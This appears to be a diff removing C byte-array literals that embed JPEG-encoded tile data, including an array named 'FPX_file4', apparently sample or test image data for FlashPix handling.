-"\xf9\xd3\x54\x48\x6e\x23\x55\x8b\x74\x67\x3b\xdf\x76\x36\xf1\xc7"
-"\x1d\xf3\x57\xaa\x91\x0f\x50\xaa\x02\x24\x85\xa4\x58\xc9\x21\x9d"
-"\x9c\xe5\xb3\xc9\x39\x35\x7e\xa8\x2a\xc2\xad\x20\x83\x6e\xd3\x23"
-"\x13\xb4\xe7\xe6\xcf\xcd\xfa\xe6\x87\xb0\x2d\xc5\xa2\x8a\x2a\x4b"
-"\x0a\x55\x05\x98\x01\xde\x92\x9d\x6d\x1d\xbd\xc3\xad\xca\x91\x23"
-"\xc4\x59\x01\x04\xfc\xa7\xa3\x0c\x7a\xf1\x4d\x21\x37\x62\x7b\x68"
-"\xe4\x8a\xdd\x52\x59\x7c\xd7\x1d\x5f\x68\x5c\xfe\x02\xa5\xa2\x8a"
-"\x64\x85\x67\xa3\x42\xc6\x43\x6f\xb7\x6f\x98\xc0\xed\x18\xf9\xb3"
-"\xf3\x7e\x39\xcd\x68\x55\x01\x2a\x4c\xd2\x34\x60\x80\xae\xc8\x72"
-"\xb8\xe4\x1c\x1f\xff\x00\x5d\x0f\x60\x5b\x8b\x45\x14\x54\x96\x15"
-"\x3d\x9c\xb1\xcb\x06\x62\x04\x05\x66\x53\x95\xc7\x20\xe0\xfe\xb5"
-"\x05\x58\xb4\x97\xcd\x87\x3e\x5b\xa6\x18\xae\x18\x63\x38\x38\xcf"
-"\xd0\xd3\x44\xb2\x6a\x28\xa6\xb3\x2a\x90\x19\x80\x2c\x70\x32\x7a"
-"\x9a\x62\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
-"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
-"\x11\x00\x3f\x00\xf4\x70\x24\x32\xc6\x12\x2d\xe8\x5b\x0e\xdb\xb1"
-"\xb4\x63\xaf\xbf\xa5\x5e\xa8\x6d\x62\x92\x18\x02\x4b\x2f\x9a\xf9"
-"\x24\xb6\xdd\xbd\xf8\x18\xf6\x1c\x54\xd4\x06\xe1\x4d\x93\x7f\x96"
-"\xde\x56\xdd\xf8\x3b\x77\x74\xcf\x6c\xd3\xaa\x85\xab\xcf\x73\xa9"
-"\x4f\x33\x17\x8e\xda\x1c\xc3\x1a\x1e\x37\xb7\xf1\x31\xf6\xec\x3f"
-"\x1f\x5a\x69\x09\xbe\x84\xba\x6d\x98\xb1\xb2\x48\x4b\x99\x24\xc9"
-"\x69\x24\x3d\x5d\xcf\x2c\x7f\x3a\xb5\x45\x14\x37\x77\x76\x09\x59"
-"\x59\x05\x53\xd6\x7f\xe4\x09\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\xae"
-"\x55\x3d\x67\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x69\xc7\xe2\x42"
-"\x97\xc2\xcb\x94\x51\x48\xcc\xa8\xa5\x98\x85\x50\x32\x49\x38\x00"
-"\x54\x94\x56\xbb\xbc\xfb\x3c\xf6\xd0\x24\x7e\x64\xb7\x0f\x80\xb9"
-"\xc6\x14\x72\xcc\x7d\x80\xfd\x48\x1d\xea\xd5\x57\x8a\x1b\x79\x2e"
-"\x05\xf4\x78\x77\x92\x30\xaa\xe0\xe4\x6d\xeb\xc7\xd7\x3f\xca\xac"
-"\x53\x76\x12\xb8\x51\x45\x14\x86\x15\x4f\x59\xff\x00\x90\x25\xf7"
-"\xfd\x7b\xc9\xff\x00\xa0\x9a\xb9\x54\xf5\x9f\xf9\x02\x5f\x7f\xd7"
-"\xbc\x9f\xfa\x09\xaa\x8f\xc4\x89\x97\xc2\xcb\x95\x4f\x53\xb5\x92"
-"\xfa\x04\xb6\x0c\x16\x17\x71\xe7\xfa\xb2\x77\x51\xf5\xe0\x1f\x6c"
-"\xd4\xf7\x57\x11\xda\xda\xc9\x71\x2e\x76\x46\xa5\x8e\x06\x49\xf6"
-"\x1e\xf5\x16\x9a\x2e\x7e\xc6\xaf\x7a\xdf\xbf\x90\x97\x65\xec\x99"
-"\xe8\xa3\xe8\x38\xa1\x5d\x7b\xc0\xec\xfd\xd2\xc8\x00\x00\x00\xc0"
-"\x1d\xa9\x68\xa2\xa4\xa0\xa2\x8a\x28\x00\xaa\x7a\xcf\xfc\x81\x2f"
-"\xbf\xeb\xde\x4f\xfd\x04\xd5\xca\xa7\xac\xff\x00\xc8\x12\xfb\xfe"
-"\xbd\xe4\xff\x00\xd0\x4d\x54\x7e\x24\x4c\xbe\x16\x3e\x1b\xc5\x9e"
-"\xfa\x7b\x68\xd0\x91\x00\x50\xf2\x76\xdc\x79\xdb\xf5\x03\x07\xf1"
-"\x15\x66\xa0\xb3\xb5\x8e\xce\x0f\x2a\x2d\xc4\x16\x2e\xcc\xc7\x25"
-"\x89\x39\x24\x9a\x9e\x93\xb5\xf4\x1a\xbd\xb5\x0a\x28\xa2\x90\xc2"
-"\x8a\x40\x41\x19\x07\x20\xd2\xd0\x01\x55\x75\x48\xde\x6d\x2a\xee"
-"\x28\x97\x73\xbc\x2e\xaa\x3d\x49\x53\x8a\xb5\x45\x34\xec\xee\x26"
-"\xae\xac\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
-"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
-"\x11\x00\x3f\x00\xf4\x2f\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe"
-"\x55\xa7\x59\x9e\x1a\xff\x00\x91\x6f\x4f\xff\x00\xae\x0b\xfc\xab"
-"\x4e\xae\xa7\xc4\xc8\xa7\xf0\x20\xa8\x2f\x2d\xa3\xbc\xb4\x92\xde"
-"\x5c\xec\x90\x63\x23\xa8\xf4\x23\xdc\x1e\x6a\x7a\x2a\x13\xb1\x6d"
-"\x5f\x41\x90\xab\xa4\x28\x92\x3f\x98\xea\xa0\x33\xe3\x1b\x8f\xae"
-"\x29\xf5\x42\xf2\x39\xa1\xd4\x20\xbc\x81\x5e\x40\x71\x0c\xd1\x83"
-"\xfc\x24\xf0\xc0\x7a\x83\xfa\x13\xe9\x57\xe9\xb5\xd4\x49\xf4\x19"
-"\x2c\x69\x34\x6d\x1c\xa8\xae\x8c\x30\xca\xc3\x20\x8a\xa3\x75\x1a"
-"\xcc\xf2\x5a\x95\x9d\x57\x00\xee\x5f\x94\x30\xfe\xe8\x6f\xc3\x9e"
-"\xbf\x08\x51\xb0\x08\x04\xe0\xe4\x8e\x4e\x2b\x4a\x99\x34\x31\xce"
-"\x9b\x25\x40\xeb\x9c\xe0\xd2\x8c\x14\x5d\xca\x9c\xdc\xa3\x63\x1a"
-"\x3d\x54\x6a\x93\xc1\x0c\x56\xb2\xc5\xe5\xca\xac\xcd\x26\x00\xc0"
-"\xfc\x79\xad\xf8\xa3\xf3\x1f\xe6\x1f\x28\xea\x08\xeb\x55\x63\xb1"
-"\xb5\x13\x2f\x97\x04\x62\x4e\xa3\xfc\x6b\x4d\x14\x22\x05\x5e\x82"
-"\xb6\x93\x4f\xe1\x47\x3c\x54\x97\xc4\xc6\xcf\x27\x95\x19\x60\xa5"
-"\x8f\x40\xa3\xb9\xa8\xae\x23\x58\xec\x2e\x02\x8c\x65\x18\x9f\xae"
-"\x2a\x44\xdc\xf3\x17\x0e\x0c\x40\x6d\x00\x7a\xe7\x9c\xd2\x5e\xff"
-"\x00\xc7\x8c\xff\x00\xf5\xcd\xbf\x95\x0b\x70\x7b\x0d\xba\xfe\x0f"
-"\xbd\xdf\xa7\x4a\x86\xa6\xba\xfe\x0e\x3d\x79\xcd\x43\x50\xcd\x10"
-"\x51\x45\x49\x02\x6f\x7d\xc7\xee\xaf\x62\x3b\xd2\x06\xc9\x2d\xd0"
-"\xaa\x6e\x60\xc0\xb7\x25\x4e\x38\xf6\xe2\x96\x69\x02\x94\x4c\x31"
-"\x32\x1c\x0c\x76\xf7\xa9\x09\x00\x64\xf0\x2a\x38\x84\x85\x9d\x9d"
-"\x81\x52\x7e\x40\x3b\x0a\xb2\x18\xe8\xa3\x58\xa2\x58\xe3\x18\x55"
-"\x18\x02\x99\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x55\x35\x43"
-"\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x54\x2d\xc1\xec\x36\xeb"
-"\x19\x4e\x07\x7f\xad\x43\x53\x5d\x11\xb9\x06\x46\x79\xe3\xbd\x43"
-"\x52\xca\x42\xa8\x2c\xe1\x46\x32\x7d\x4f\x6a\xb6\xaa\x15\x42\x8e"
-"\x82\xab\x41\xfe\xbc\x0c\x8e\x87\x8c\x55\xa2\x40\xeb\x4d\x03\x21"
-"\x98\xa4\xaf\xf6\x66\x0c\x77\x2e\x5b\x1d\x85\x4c\x00\x03\x03\x80"
-"\x2a\x38\x04\x9e\x58\x33\x63\x79\xe4\x81\xdb\xda\xa5\xa6\xc9\x5d"
-"\xc2\xa1\xbd\xff\x00\x8f\x19\xff\x00\xeb\x9b\x7f\x2a\x96\x9b\x2a"
-"\x09\x62\x78\xd8\x90\x1d\x4a\x9c\x7b\xd0\x81\xec\x00\xff\xd9\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
-"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
-"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xd7\x86"
-"\xf5\xe4\x99\x51\xe1\xd8\x09\x2b\x9c\xe7\x91\xf8\x74\xad\x9d\x18"
-"\xe3\x53\xce\x40\x3e\x53\x73\x8e\x7b\x53\x22\xd3\xee\x64\x82\x29"
-"\xbf\x74\x04\xaa\x0a\xe5\xfa\xe7\xb7\x4a\xd0\xd3\x74\xc9\xed\xae"
-"\x1e\x79\x98\x0c\x21\x50\xa8\x73\x9f\x7a\xf1\x70\xd8\x5a\xb0\xac"
-"\xa4\xe3\x64\x8f\x42\xb5\x78\x4a\x9b\x49\xdc\xb4\x39\x03\xbd\x15"
-"\xfc\xd6\x8d\x47\x70\xae\xf6\xee\x22\xdb\xe6\x6d\x3b\x37\xf4\xcf"
-"\x6c\xd2\x02\x87\x86\xbf\xe4\x5b\xd3\xff\x00\xeb\x82\xff\x00\x2a"
-"\xd3\xac\xcf\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe\x55\xa7\x57"
-"\x53\xe2\x64\xd3\xf8\x10\x51\x45\x15\x05\x85\x53\xb5\xbb\x69\x2f"
-"\x6e\x6d\x27\x55\x49\x62\x21\x93\x1d\x1e\x33\xd1\xbf\x3c\x83\xf4"
-"\xf7\xab\x95\x0c\xb1\xc2\xb2\x0b\xa7\x41\xbe\x24\x60\x1f\x19\x21"
-"\x4e\x09\x1f\xa0\xa6\xac\x27\x72\x6a\x29\x90\xcb\x1c\xf0\xa4\xd0"
-"\xb0\x78\xdd\x43\x2b\x0e\x84\x1a\x7d\x21\x99\x9e\x1a\xff\x00\x91"
-"\x6f\x4f\xff\x00\xae\x0b\xfc\xab\x4e\xb3\x3c\x35\xff\x00\x22\xde"
-"\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x5d\x4f\x89\x91\x4f\xe0\x41\x45"
-"\x14\x54\x16\x14\x51\x45\x00\x54\xd3\xec\xcd\x90\x9a\x25\x70\x60"
-"\x69\x0b\xc4\x98\xfb\x80\xf2\x57\xe9\x9c\x91\xf5\xab\x75\x5b\x50"
-"\x86\x69\xad\x18\x5a\xca\x63\x9d\x48\x78\xce\x70\x09\x1c\xe0\xfb"
-"\x1e\x87\xeb\x4e\xb3\xb8\xfb\x55\xa4\x53\xf9\x6f\x19\x75\xc9\x47"
-"\x18\x2a\x7b\x83\x54\xf5\xd4\x95\x65\xee\x95\xf4\x18\x64\xb7\xd0"
-"\xac\xa1\x9d\x0a\x48\x90\xaa\xb2\x9e\xa0\xe2\xaf\xd1\x49\x91\x90"
-"\x32\x32\x7a\x0a\x4d\xdd\xdc\x71\x56\x56\x16\x8a\x28\xa4\x30\xa2"
-"\x8a\x28\x00\xaa\xb3\xdd\x34\x17\xb6\xf0\xb4\x44\xc5\x3e\xe5\xf3"
-"\x07\xf0\xb8\x19\x00\x8f\x71\x9e\x7d\xbd\xea\xd5\x14\xd0\x98\xff"
-"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff"
-"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03"
-"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00"
-"\xe9\xec\xe7\x9e\x13\x01\x8e\x62\xc2\x47\x55\x58\x23\x5f\x92\x33"
-"\x9c\x34\x64\x63\xe5\x20\x64\x86\x3d\x70\x73\x5d\x05\x43\x72\xcb"
-"\x65\x6f\x35\xd3\xc4\xbe\x62\xa6\xe7\xda\x39\x6c\x0e\x99\xa8\x56"
-"\x5b\xb8\x67\x85\x2e\xcc\x2e\xb3\x9d\xa3\xca\x52\xbb\x1b\x04\xe3"
-"\x92\x72\x38\x3c\xf1\x57\x27\xcf\xa9\x10\x5c\x9a\x32\xe5\x14\x51"
-"\x59\x1b\x05\x14\x51\x40\x05\x14\x55\x2b\xfb\xc4\x58\x64\x8e\x0b"
-"\x85\x12\xa1\x5f\x37\x61\x05\xe3\x42\x46\xe6\xc7\xb0\xa6\x93\x6e"
-"\xc8\x99\x49\x45\x5d\x9a\x37\x36\xe8\x5d\xee\x1e\x46\xda\x23\x2a"
-"\xc8\xc7\xe4\xc7\x5c\xe3\xd6\xb2\xa6\xb7\x0b\x6a\x50\x5e\x7d\x9b"
-"\x4f\x0b\xb8\xba\xc9\xf3\x10\x7b\x06\x3f\x75\x7a\x74\xfd\x2b\x78"
-"\xf2\x30\x6a\x85\xdc\x08\x59\x6d\xd6\x16\x48\xf6\x65\x1d\x54\x6d"
-"\x8c\x8e\x98\xf4\x3c\xf1\xc5\x5a\x76\x21\xab\x95\x74\xdb\x9f\x36"
-"\x33\x14\x92\x66\x55\xcb\x28\x61\xb5\xcc\x79\xc2\xb1\x5e\xd9\xab"
-"\x95\x8d\xb1\x1a\xf1\x2d\xf4\xf4\x58\xae\x22\x32\x3c\x8f\x22\xee"
-"\x62\xc3\x00\x16\x63\xce\x1b\x27\x9e\xb5\xb2\x7f\x2c\xf4\xa5\x34"
-"\x93\xba\x0a\x6d\xb5\x66\x14\x51\x54\x2e\xb5\x03\x05\xd9\x8d\x43"
-"\x49\x18\x5f\xde\xb2\x46\x4f\x90\x7a\x86\x27\xa6\x3d\xba\x8e\xb5"
-"\x2a\x2e\x5b\x17\x29\x28\xab\xb1\xda\x95\xd9\x82\x10\x21\x7c\x1d"
-"\xea\x24\x75\xc3\x18\x54\x9e\x58\x8f\xf3\x8a\x8a\x2b\x16\x29\xf6"
-"\x79\x8b\x3e\xc6\x33\x43\x77\x1e\x15\x81\x27\x3c\xfb\xf3\xf4\x22"
-"\xa0\xb4\xb7\xdf\x1d\x9a\xad\x99\x49\xa2\x60\xcf\x73\xc6\xd7\x18"
-"\xf9\x88\x6c\xe5\xb7\x7a\x7b\xf3\xd2\xb5\xed\xd2\x14\x75\xb4\x87"
-"\x62\x6c\x5c\x88\xc1\xfb\xab\x9f\x4f\x4a\xd1\xfb\xaa\xc8\xc9\x7b"
-"\xee\xec\xd0\xa4\x61\x95\x23\xd6\x96\x8a\x83\x43\x2e\x58\x6e\x92"
-"\x38\xdd\x88\x7b\x84\x52\x36\x2b\x15\x89\xc9\xee\x7f\x9d\x65\x42"
-"\x86\x7d\x41\x2e\xfc\x89\x2f\x54\x1c\x34\xe7\x0a\xaa\x41\xe0\xc4"
-"\xa7\x9c\x0e\xe7\xb8\xf5\xae\x86\xea\x28\xcb\x24\xf2\x48\xc9\xe5"
-"\x03\x8f\x9b\x0a\x73\xeb\xeb\xda\xa1\xaa\x52\xe5\x25\xc3\x98\x2a"
-"\x93\xdb\x5d\x24\xb3\xfd\x96\x58\x84\x73\x9d\xcd\xe6\x29\x25\x0e"
-"\x00\x24\x63\xaf\x4e\x86\xae\xd0\x08\xc8\x0c\xc1\x72\x40\x04\x9c"
-"\x73\x50\x9b\x45\xc9\x27\xb9\x04\x56\xe6\xd2\xc9\x20\xb1\xb7\xde"
-"\x23\x01\x55\x37\x05\xe3\x3c\x9c\xfe\x66\xb4\x92\x34\x43\xb9\x54"
-"\x06\xc6\x0b\x63\x92\x29\x96\xd0\x18\x23\x2a\x65\x79\x49\x62\xdb"
-"\x9f\xb6\x4f\x41\xec\x2a\x6a\xa2\x50\x51\x45\x14\x86\x57\xbe\xfb"
-"\x39\xb4\x7f\xb5\xec\xf2\xb8\xce\xfe\x99\xcf\x1f\xae\x2a\x23\xd6"
-"\xa6\xbd\x92\x28\xad\x5d\xee\x00\x31\xf0\x0e\x57\x77\x24\xe0\x71"
-"\xf5\xc5\x42\x7a\xd0\xc6\xb7\x12\x9a\xed\x02\xb4\x7f\x68\xdb\xb4"
-"\xc8\xa1\x77\x0f\xe2\xcf\xcb\xf8\xe7\x14\xea\x46\x92\x38\x9a\x36"
-"\x94\x12\x0b\xaa\x8f\x97\x3c\x93\x81\xfa\xf7\xa4\xb7\x07\xb1\x7e"
-"\x8a\x28\xa6\x20\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0b\x5c\xc6\x8e\x11\xc9\x07\x81\x92\x3b\xfa\x7d\x6a\x6a\xf6\x6c"
-"\x70\xa7\x70\xac\xb8\xf5\x2b\xad\x8b\xe6\x5a\xe7\xfb\xc4\x13\xed"
-"\xdb\x1e\xf5\xa9\x45\x20\x0a\x28\xa2\x81\x8b\xa7\xc6\xb2\x68\xf6"
-"\x8a\xe0\x11\xe5\x21\xfc\x70\x2a\xcc\x32\x34\x91\xe5\xd0\xa3\x02"
-"\x41\x06\xa1\xd2\xff\x00\xe4\x15\x69\xff\x00\x5c\x53\xf9\x0a\x92"
-"\x4c\xc7\x28\x99\xa4\x0b\x18\x18\x60\x7a\x7b\x1a\xd2\x5b\xb3\x18"
-"\xec\x8a\x1a\x8d\x9e\x1c\x49\x1a\x8d\xc3\xa7\x27\x27\x8a\x2d\x27"
-"\xf3\x53\x6b\x70\xeb\xc1\xf7\xf7\xad\x37\x50\xe8\x54\x92\x33\xdc"
-"\x56\x2d\xd4\x73\x5b\x5d\xf9\x91\xc6\xcd\xb8\x8c\xa8\x6c\x9c\x73"
-"\xdb\xde\x8d\xd5\x87\xf0\xbb\x97\xa8\xa6\xc4\xe2\x48\x95\xc1\xce"
-"\x47\x5c\x62\x9d\x59\x9a\x05\x14\x51\x40\xc9\x34\xbf\xf9\x05\x5a"
-"\x7f\xd7\x14\xfe\x42\xac\x3a\x2c\x91\xb2\x38\x0c\xac\x08\x20\xf7"
-"\x15\x5f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x69\x2d"
-"\xd9\x94\x7e\x14\x45\x13\x92\xcf\x19\x52\xa5\x0e\x06\x79\xc8\xf5"
-"\xa6\xdc\xc2\x24\x8c\xf1\x9e\x39\x18\xe5\x87\xa5\x3a\x60\xf9\x47"
-"\x47\x0a\x14\xe5\x81\xe8\x45\x48\x08\x60\x0a\x9c\x83\xd0\x8a\x43"
-"\x31\xad\x97\xec\x5f\xba\x91\xdd\xf3\x8e\xdc\x2f\x6a\xb9\x49\x7f"
-"\x6a\xac\xa5\x95\x47\x3e\xe7\x93\xfe\x15\x5e\xc6\x56\x31\x14\x93"
-"\x07\x67\x1b\x87\x43\x43\xd7\x50\x8b\xb6\x85\x9a\x8e\x79\x92\x08"
-"\x9a\x47\xe8\x06\x71\xdc\xd1\x3c\xc9\x02\x6f\x7e\x99\xc5\x54\x85"
-"\x0d\xe4\xc6\x49\x71\xb0\xe0\x28\xc9\xfc\xa9\x25\xd5\x8e\x52\xb6"
-"\x8b\x73\x4f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x45"
-"\x6f\x12\xdb\xdb\x47\x0a\x92\x56\x35\x0a\x09\xf6\xe2\xa5\xa6\xdd"
-"\xd8\x92\xb2\x12\xa1\x84\xac\x52\x7d\x99\x54\xa8\x0b\xb9\x4f\x62"
-"\x2a\x7a\x64\x8a\xcc\x06\xd6\xda\x41\x07\x38\xfd\x28\x06\x38\x8c"
-"\x82\x2b\x2e\xe6\xc8\x34\xc3\xe7\x2a\xaa\x77\x63\x39\xcf\xbd\x6a"
-"\xd5\x49\xc8\xf3\xc8\xca\xe7\x68\xe9\xd7\xbd\x2b\xd8\x76\xbe\xe4"
-"\x32\xc4\xb2\x80\x18\x91\x8e\x84\x1c\x55\x9b\x68\x04\x68\x32\x31"
-"\xc0\x01\x7f\xbb\x50\x31\x01\x72\x4a\x80\x3b\xb7\x4a\xbf\x42\x07"
-"\xb8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"
-"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11"
-"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22"
-"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11"
-"\x03\x11\x00\x3f\x00\xed\xaf\xaf\x9a\x38\xf6\x61\xa2\x60\xc0\xcc"
-"\x54\x82\xd1\x47\x9c\x6f\xf7\x1c\x75\xed\x4d\x1a\x74\x8d\x7c\x27"
-"\xfb\x44\x84\x88\xf1\x1d\xca\x95\x2d\xb4\xff\x00\x09\x04\x10\x7d"
-"\x98\x7f\xfa\xe1\x86\xde\x27\xd4\x55\x2c\xae\x0c\xd0\xa0\x32\x34"
-"\x9e\x66\xe3\x13\x93\xd0\x1e\x84\x37\x39\x53\xc7\x7a\xd7\x86\x24"
-"\x28\xd6\xd6\xac\x91\x79\x6b\x80\xab\x83\xe5\xe7\xa7\x15\xa3\x7c"
-"\xba\x44\xc9\x2e\x67\x79\x0d\xb7\x84\x41\xe4\x5b\x43\x0b\x98\xb9"
-"\x05\xc1\x1f\x2f\x7c\x9c\xf5\x24\xd5\xe8\xa1\x8e\x10\xc2\x28\xd5"
-"\x37\x31\x66\xda\x31\x92\x7a\x93\xef\x4b\x0a\x18\xe1\x44\x2e\x5c"
-"\xa8\x00\xb1\xea\xc7\xd6\x9f\x59\x9a\x05\x14\x53\x25\x96\x38\x62"
-"\x79\x65\x70\x91\xa0\x2c\xcc\xc7\x00\x01\xde\x81\x91\xde\x5d\x45"
-"\x65\x6c\xd7\x13\x92\x11\x7b\x01\x92\xc4\xf4\x00\x77\x24\xd3\x91"
-"\x56\x41\x1c\xcf\x08\x59\x02\xf1\xb8\x02\xc9\x9c\x64\x67\xfc\xf4"
-"\xa8\xda\xde\xde\xee\x5b\x7b\xb6\xcb\xf9\x63\x74\x59\x27\x03\x23"
-"\xef\x63\xd7\x1f\x96\x4d\x59\xa7\xa1\x2a\xed\x99\xfb\x59\x3c\xb4"
-;
-
-unsigned char FPX_file4[] = 
-"\x82\x0d\xc0\xb8\x0d\xb7\x0a\x10\x1e\xad\x57\x52\x28\xe3\x66\x64"
-"\x45\x56\x6c\x6e\x20\x72\xdf\x5f\x5a\x6d\xb4\x26\x0b\x75\x8d\xa5"
-"\x79\x58\x75\x77\xc6\x4f\xe5\x52\xd2\x28\x28\xa2\x8a\x00\x2a\x9d"
-"\xdd\x92\xdf\x49\x01\x96\x4d\xd6\xf1\x9d\xe6\x20\x38\x91\xbf\x84"
-"\x93\xdc\x0e\xb8\xf5\xc7\xa5\x37\x51\xb6\x9e\xf5\xa3\xb6\x0c\x23"
-"\xb4\x6c\x99\xc8\x38\x67\x1f\xdc\x1e\x80\xf7\x3e\x9c\x77\xab\x8a"
-"\xaa\x8a\x15\x00\x55\x51\x80\x07\x40\x2a\xb6\xd5\x13\xf1\x68\xc7"
-"\x51\x45\x15\x25\x05\x14\x51\x40\x05\x50\xd4\x9a\xea\x56\x4b\x3b"
-"\x30\xf1\x99\x41\x32\x5c\x01\xc4\x4b\xdf\x1f\xed\x1e\xdf\x9f\x6a"
-"\x5d\x46\xf1\xe1\x64\xb5\xb3\x55\x92\xf2\x6f\xb8\xad\xd1\x07\x77"
-"\x6f\x61\xfa\x9c\x0a\xba\xb9\x0a\x01\x39\x3d\xcd\x52\xf7\x75\x25"
-"\xfb\xda\x08\x8b\xb1\x15\x72\x4e\x06\x32\x4e\x49\xa7\x51\x45\x49"
-"\x41\x48\x48\x00\x92\x70\x07\x7a\x5a\xc3\xf1\x6d\xdc\x90\xe9\x42"
-"\xd2\xdb\xfe\x3e\x6f\x9c\x5b\xc6\x3e\xbd\x4f\xe5\xfc\xea\xa1\x1e"
-"\x69\x24\x4c\xe5\xcb\x16\xcd\xca\xab\x7f\x7a\xb6\x51\x29\xd8\x65"
-"\x9a\x46\xd9\x14\x4b\xd5\xdb\xd3\xd8\x77\x27\xb0\xab\x55\x00\xb5"
-"\x8b\xed\xa6\xed\x81\x69\x76\xec\x52\xdf\xc0\x3b\x81\xf5\xc5\x25"
-"\x6e\xa3\x77\xb6\x84\xa0\x7f\x11\x50\x1b\x18\x34\xea\x28\xa4\x30"
-"\xa2\x91\x59\x5b\x3b\x48\x38\x38\x38\x3d\x0d\x19\x00\x81\x9e\x4d"
-"\x00\x2d\x73\xd6\xd1\xbe\xa7\xe3\x09\xee\xe4\x56\x16\xfa\x72\xf9"
-"\x30\x86\x1c\x19\x08\xf9\x8f\xe5\xfd\x2b\xa1\xa4\xdc\x37\x6d\xc8"
-"\xdd\x8c\xe3\xbd\x54\x65\xcb\x72\x25\x1e\x6b\x00\xff\xd9\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11"
-"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff"
-"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa1"
-"\xad\xea\x0b\xa5\xe9\x17\x17\x87\x1b\x91\x7e\x40\x7b\xb1\xe0\x0f"
-"\xce\xaf\xd7\x39\xab\x7f\xc4\xdb\xc5\x16\x7a\x58\xe6\x0b\x41\xf6"
-"\xab\x8f\x42\x7f\x85\x7f\xcf\x63\x5a\x53\x8a\x72\xd7\x63\x3a\x92"
-"\x6a\x3a\x6e\xcb\xde\x1a\xd3\xdb\x4e\xd1\xa2\x49\x7f\xe3\xe2\x5f"
-"\xde\xcc\x4f\x52\xed\xc9\xcf\xd3\xa7\xe1\x5a\xb4\x51\x53\x29\x39"
-"\x3b\xb2\xa3\x15\x14\x92\x0a\x28\xa2\xa4\xa3\x9c\x8f\xfe\x25\x1e"
-"\x33\x74\xfb\xb6\xda\xaa\xee\x5f\x41\x2a\xf5\xfc\xc7\xea\x6b\xa3"
-"\xac\x6f\x15\xd9\x3d\xde\x8c\xd2\xdb\xf1\x73\x68\xc2\xe2\x12\x3a"
-"\xe5\x79\xfe\x59\xfd\x2a\xfe\x97\x7a\x9a\x8e\x9b\x6f\x79\x1f\x02"
-"\x54\x0d\x8f\x43\xdc\x7e\x06\xb5\x9f\xbd\x15\x2f\x91\x8c\x3d\xd9"
-"\x38\xfc\xc9\x6e\xae\x23\xb5\xb5\x96\xe2\x53\x84\x89\x0b\xb1\xf6"
-"\x02\xb1\xbc\x23\x6f\x23\x59\xcd\xaa\x5c\x8c\x5c\x6a\x12\x19\x4f"
-"\xb2\x7f\x08\xfc\xbf\x9d\x33\xc5\x2e\xd7\xb3\x59\xe8\x70\x92\x0d"
-"\xe3\xee\x98\x8f\xe1\x89\x79\x3f\x9f\xf4\xad\xf8\xd1\x63\x8d\x63"
-"\x8d\x42\xa2\x80\x14\x0e\xc2\x8f\x86\x1e\xbf\x90\x7c\x55\x3d\x3f"
-"\x31\xd4\x51\x45\x64\x6c\x14\x51\x45\x00\x21\xe4\x60\xd7\x3d\xe1"
-"\xff\x00\xf8\x96\x6b\x57\xfa\x21\xe2\x3c\xfd\xa6\xdb\xfd\xc6\xea"
-"\x07\xd0\xd7\x45\x5c\xf7\x8a\xd1\xac\xda\xd3\x5b\x84\x12\xf6\x52"
-"\x62\x40\x3f\x8a\x36\xe0\x8f\xf3\xeb\x5a\xd3\xd6\xf0\xef\xf9\x99"
-"\x55\xd2\xd3\xed\xf9\x75\x1b\xe1\xa0\x75\x2d\x4a\xff\x00\x5d\x71"
-"\xf2\xca\xde\x45\xb6\x7b\x46\xbd\xff\x00\x13\xfc\x8d\x74\x75\x5e"
